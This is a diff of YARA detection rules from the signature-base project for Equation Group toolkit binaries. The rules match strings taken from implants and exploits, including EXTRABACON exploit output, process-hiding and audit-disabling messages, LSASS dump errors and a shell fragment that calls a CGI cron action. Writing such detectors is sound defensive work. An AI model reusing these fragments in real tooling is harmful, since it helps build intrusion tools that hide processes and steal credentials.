-		$s1 = "_lib_version" ascii
-		$s2 = ",%02d%03d" fullword ascii
-		$s3 = "TRANSIT" fullword ascii
+		$s1 = "|###[ SNMPresponse ]###" fullword ascii
+		$s2 = "[+] generating exploit for exec mode pass-disable" fullword ascii
+		$s3 = "[+] building payload for mode pass-disable" fullword ascii
+		$s4 = "[+] Executing:  extrabacon" fullword ascii
+		$s5 = "appended AAAADMINAUTH_ENABLE payload" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Noprep : FILE
+rule SIGNATURE_BASE_EQGRP_Unique_Strings
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - Unique strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "27e9e51a-c853-5dcc-97d2-d3d31c5ccfac"
-		date = "2017-04-09"
+		id = "08f5f1e3-ce4e-54ef-922f-50446edfcd70"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1188-L1203"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1292-L1305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c27815333e05d318bc32d01e755386bc1d1dbfd9f2b92a460fbd0f703e9ba210"
+		logic_hash = "070358ec9cccb5d9daa4e5a016d4f9a988b600d675484f06dc9a897cadf7af0c"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb"
 
 	strings:
-		$x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" fullword ascii
-		$x2 = "The NOPEN-args provided are injected into infile if it is a valid" fullword ascii
-		$x3 = " -i                do not autokill after 5 hours" fullword ascii
+		$s1 = "/BananaGlee/ELIGIBLEBOMB" ascii
+		$s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)"
 
 	condition:
-		( filesize < 9KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cursezinger_Linuxrh7_3_V_2_0_0 : FILE
+rule SIGNATURE_BASE_EQGRP_RC5_RC6_Opcode
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EQGRP Toolset Firewall - RC5 / RC6 opcode"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d4cab478-da1e-54ef-995a-897d1813619e"
-		date = "2017-04-09"
+		id = "b12a1a2c-8d32-5318-a658-6aa1a08c3263"
+		date = "2016-08-17"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1205-L1221"
+		reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1307-L1326"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa56fe4dd44d266741a3f0b0edfc24660b260c1ade45c23171f22bc43a3bee75"
+		logic_hash = "a79208c5924e1d5cc9db922f80403514e516eadb725393c1ebc9a6236ca90b98"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "af7c7d03f59460fa60c48764201e18f3bd3f72441fd2e2ff6a562291134d2135"
 
 	strings:
-		$s1 = ",%02d%03d" fullword ascii
-		$s2 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
-		$s3 = "__strtoll_internal" ascii
-		$s4 = "__strtoul_internal" ascii
+		$s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 400KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Seconddate_Implantstandalone_3_0_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Implant : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file modifyAudit_Implant.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08b1aa88-8731-51db-b659-96147f509bcd"
-		date = "2017-04-09"
+		id = "0321f6c0-2250-5991-a1d9-f0598e13c665"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1223-L1238"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1337-L1353"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8d56f471104bfb2ef2bf730e5a8b60c123706f12eb52226895b123b16eed2883"
+		logic_hash = "ec8b54f3489b1eeef491b03641805e0e4db0b5cbbb67a3ae3d37dad184f54b01"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511"
+		hash1 = "b7902809a15c4c3864a14f009768693c66f9e9234204b873d29a87f4c3009a50"
 
 	strings:
-		$s1 = "EFDGHIJKLMNOPQRSUT" fullword ascii
-		$s2 = "G8HcJ HcF LcF0LcN" fullword ascii
-		$s3 = "GhHcJ0HcF@LcF0LcN8H" fullword ascii
+		$s1 = "LSASS.EXE" fullword wide
+		$s2 = "hNtQueryInformationProcess" fullword ascii
+		$s3 = "hZwOpenProcess" fullword ascii
+		$s4 = ".?AVFeFinallyFailure@@" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Watcher_Solaris_I386_V_3_3_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Lp : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file modifyAudit_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e75c6ed9-b6e6-530d-a6ac-40bd0477754f"
-		date = "2017-04-09"
+		id = "9dcfa774-0048-5bd9-ba7d-87bbdff9567a"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1240-L1256"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1355-L1372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "61ded97e99e6bdfe2738c6d73719b3182d970aba8ea9d7cab751349669129de2"
+		logic_hash = "a908d44b831a27bb584c5da936346f77f0e205658ec2ebe0e600004645894593"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "395ec2531970950ffafde234dded0cce0c95f1f9a22763d1d04caa060a5222bb"
+		hash1 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
 
 	strings:
-		$s1 = "getexecname" fullword ascii
-		$s2 = "invalid option `" fullword ascii
-		$s6 = "__fpstart" ascii
-		$s12 = "GHFIJKLMNOPQRSTUVXW" fullword ascii
+		$s1 = "Read of audit related process memory failed" fullword wide
+		$s2 = "** This may indicate that another copy of modify_audit is already running **" fullword wide
+		$s3 = "Pattern match of code failed" fullword wide
+		$s4 = "Base for necessary auditing dll not found" fullword wide
+		$s5 = "Security auditing has been disabled" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Now : FILE
+rule SIGNATURE_BASE_Equationgroup_Processhide_Lp : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file ProcessHide_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
-		date = "2017-04-09"
+		id = "b0842897-f591-5213-9a26-0f8732e6f3b8"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1258-L1272"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1374-L1393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d7f009c5593ac1b1517024b828b016d705b63f6812a49d909f35c34b936e6d7"
+		logic_hash = "407045f5ac8eeec4403560de406e5d382d38ae2f34d0e4c7d3cc9b94debdfad8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4"
+		hash1 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
 
 	strings:
-		$x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" fullword ascii
-		$x2 = "exec /usr/share/redmin/cgi/redmin" fullword ascii
+		$x1 = "Invalid flag.  Can only hide or unhide" fullword wide
+		$x2 = "Process elevation failed" fullword wide
+		$x3 = "Unknown error hiding process" fullword wide
+		$x4 = "Invalid process links found in EPROCESS" fullword wide
+		$x5 = "Unable to find SYSTEM process" fullword wide
+		$x6 = "Process hidden, but EPROCESS location lost" fullword wide
+		$x7 = "Invalid EPROCESS location for given ID" fullword wide
 
 	condition:
-		( filesize < 1KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Post : FILE
+rule SIGNATURE_BASE_Equationgroup_Pwdump_Implant : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file pwdump_Implant.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
-		date = "2017-04-09"
+		id = "55984c20-539e-5e51-b3c4-caa6157c993d"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1274-L1287"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1395-L1410"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ffd95302df11d1ebab37817e967a1ad4d1e85e62b38a0ccd6adf0f36925e64c1"
+		logic_hash = "20df7ef04154e317ee844545e541d62b3b8db4ac4800ba45a26b1092499c6e69"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591"
+		hash1 = "dfd5768a4825d1c7329c2e262fde27e2b3d9c810653585b058fcf9efa9815964"
 
 	strings:
-		$x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$s8 = ".?AVFeFinallySuccess@@" fullword ascii
+		$s3 = "\\system32\\win32k.sys" wide
 
 	condition:
-		( filesize < 1KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Curseyo_Win2K_V_1_0_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_5 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file PC_Level3_http_dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8161907d-d6bd-58c5-806d-387321b93b21"
-		date = "2017-04-09"
+		id = "a67655eb-5593-5ac7-a6aa-81f235fa3c33"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1289-L1306"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1412-L1428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad9bb848a0c4805a14465ff44e3c967c9afa7369536a211a8a1fb100902fbb55"
+		logic_hash = "834a7175a23c30301fce01482a2768d453368c7ca5c72ae52b2d266b31005991"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6"
+		hash1 = "4ebfc1f6ec6a0e68e47e5b231331470a4483184cf715a578191b91ba7c32094d"
 
 	strings:
-		$s1 = "0123456789abcdefABCEDF:" fullword ascii
-		$op0 = { c6 06 5b 8b bd 70 ff ff ff 8b 9d 64 ff ff ff 0f }
-		$op1 = { 55 b8 ff ff ff ff 89 e5 83 ec 28 89 7d fc 8b 7d }
-		$op2 = { ff 05 10 64 41 00 89 34 24 e8 df 1e 00 00 e9 31 }
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s3 = "itanium" fullword wide
+		$s6 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Gr : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file PC_Level3_http_flav_dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
-		date = "2017-04-09"
+		id = "4bc4804b-c6d2-5c94-b451-24bb0f3dba43"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1308-L1322"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1430-L1447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6df2a36e51fbe23e090094a91da76ca881a65d7e129c6e428ffef13787f230bc"
+		logic_hash = "579539961e29c4da60dc632b1afd348e0d799e266f175a3bae7206b615d90f5b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262"
+		hash1 = "27972d636b05a794d17cb3203d537bcf7c379fafd1802792e7fb8e72f130a0c4"
 
 	strings:
-		$s1 = "if [ -f /tmp/tmpwatch ] ; then" fullword ascii
-		$s2 = "echo \"bailing. try a different name\"" fullword ascii
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s4 = "itanium" fullword wide
+		$s5 = "RHTTP/1.0" fullword wide
+		$s8 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		( filesize < 1KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Curseroot_Win2K_V_2_1_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_LSADUMP_Lp : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file LSADUMP_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bd2257ef-8170-547d-9c5e-7ff03404495c"
-		date = "2017-04-09"
+		id = "8068ca41-6365-5c97-82f2-be9ad89628e0"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1324-L1340"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1449-L1462"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64ea35c9287ed35b5e7fbc8aaa228f87bc003111dd6fc35f5277eeea5f371a2c"
+		logic_hash = "f67a64ae7fece949d37367d85a28a879e90844e5cc56e88a85a1cce890990f55"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603"
+		hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
 
 	strings:
-		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
-		$op0 = { c7 44 24 04 ff ff ff ff 89 04 24 e8 46 65 01 00 }
-		$op1 = { 8d 5d 88 89 1c 24 e8 24 1b 01 00 be ff ff ff ff }
-		$op2 = { d3 e0 48 e9 0c ff ff ff 8b 45 }
+		$x1 = "LSADUMP - - ERROR - - Injected" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and 2 of ( $op* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Cursewham_Curserazor_Cursezinger_Curseroot_Win2K : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Mstcp32 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file mstcp32.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a877998-7021-54cb-b068-452d005955b6"
-		date = "2017-04-09"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1342-L1362"
+		id = "bed26a7b-933f-5578-b65c-65179959050d"
+		date = "2017-01-13"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1464-L1485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a5a8e6a516b51c2eed616c80a1162990c1dda4460ec7786793d66820ca15b5a4"
+		logic_hash = "aff97f8360a0c24bfde6a1b2616749d6cad3b19993716231d32b8bb59579c638"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225"
-		hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e"
+		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
 
 	strings:
-		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
-		$s3 = ",%02d%03d" fullword ascii
-		$s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
-		$op1 = { 7d ec 8d 74 3f 01 0f af f7 c1 c6 05 }
-		$op2 = { 29 f1 89 fb d3 eb 89 f1 d3 e7 }
-		$op3 = { 7d e4 8d 5c 3f 01 0f af df c1 c3 05 }
+		$s1 = "mstcp32.sys" fullword wide
+		$s2 = "p32.sys" fullword ascii
+		$s3 = "\\Registry\\User\\CurrentUser\\" wide
+		$s4 = "\\DosDevices\\%ws" wide
+		$s5 = "\\Device\\%ws_%ws" wide
+		$s6 = "sys\\mstcp32.dbg" fullword ascii
+		$s7 = "%ws%03d%ws%wZ" fullword wide
+		$s8 = "TCP/IP driver" fullword wide
+		$s9 = "\\Device\\%ws" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_I386_V_3_3_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Nethide_Lp : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file nethide_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c5dc02b-a11a-5c61-8069-641ba90668ec"
-		date = "2017-04-09"
+		id = "39e96239-2189-5993-90ba-27e47f7bfdea"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1364-L1381"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1487-L1504"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "245662b561178f4d929ed858811846b2a49dc80af25396864a3d7bd90d16ac2b"
+		logic_hash = "70e96a8ef5f75e05b3f6d32b9b8392316c3a70cb479549a3700134435b690473"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8"
+		hash1 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
 
 	strings:
-		$s1 = "invalid option `" fullword ascii
-		$s8 = "readdir64" fullword ascii
-		$s9 = "89:z89:%r%opw" fullword wide
-		$s13 = "Ropopoprstuvwypypop" fullword wide
-		$s17 = "Missing argument for `-x'." fullword ascii
+		$x1 = "Error: Attempt to hide all TCP connections (any:any)." fullword wide
+		$x2 = "privilegeRunInKernelMode failed" fullword wide
+		$x3 = "Failed to unhide requested connection" fullword wide
+		$x4 = "Nethide running in USER_MODE" fullword wide
+		$x5 = "Not enough slots for all of the list.  Some entries may have not been hidden." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Charm_Saver_Win2K_V_2_0_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Dll_X64 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file PC_Level4_flav_dll_x64"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9c2e3b70-ffa2-598a-9f99-f7a574b06c14"
-		date = "2017-04-09"
+		id = "f05dd0b6-106c-5d1d-ba09-4ac3035e7030"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1383-L1399"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1506-L1521"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87cea1f46a3165485274165e840a4945d6f6a6f9ff7fd011e685e8bb90acae8a"
+		logic_hash = "9c874581567909055deeae4f992bd99c1e08d5f62655d1cc9a7316beb8513d8f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f"
+		hash1 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
 
 	strings:
-		$s2 = "0123456789abcdefABCEDF:" fullword ascii
-		$op0 = { b8 ff ff ff ff 7f 65 eb 30 8b 55 0c 89 d7 0f b6 }
-		$op2 = { ba ff ff ff ff 83 c4 6c 89 d0 5b 5e 5f 5d c3 90 }
+		$s1 = "wship.dll" fullword wide
+		$s2 = "   IP:      " fullword ascii
+		$s3 = "\\\\.\\%hs" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Cursehappy_Win2K_V_6_1_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Exe : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file PC_Level4_flav_exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7b75d4aa-2cbc-57fc-8fda-015bbc1fb25e"
-		date = "2017-04-09"
+		id = "eb93a798-4e7e-52dc-a39b-bfb63a58d250"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1401-L1415"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1523-L1541"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3bf5878c3be20a7a543d4937c6d820df726062e39ee262a6c31f7e91b32fd55e"
+		logic_hash = "975d327d5922e4b179a677501c2613186ea85299958a996dcdeb503b02495ff7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632"
+		hash1 = "33ba9f103186b6e52d8d69499512e7fbac9096e7c5278838127488acc3b669a9"
 
 	strings:
-		$op1 = { e8 24 2c 01 00 85 c0 89 c6 ba ff ff ff ff 74 d6 }
-		$op2 = { 89 4c 24 04 89 34 24 89 44 24 08 e8 ce 49 ff ff }
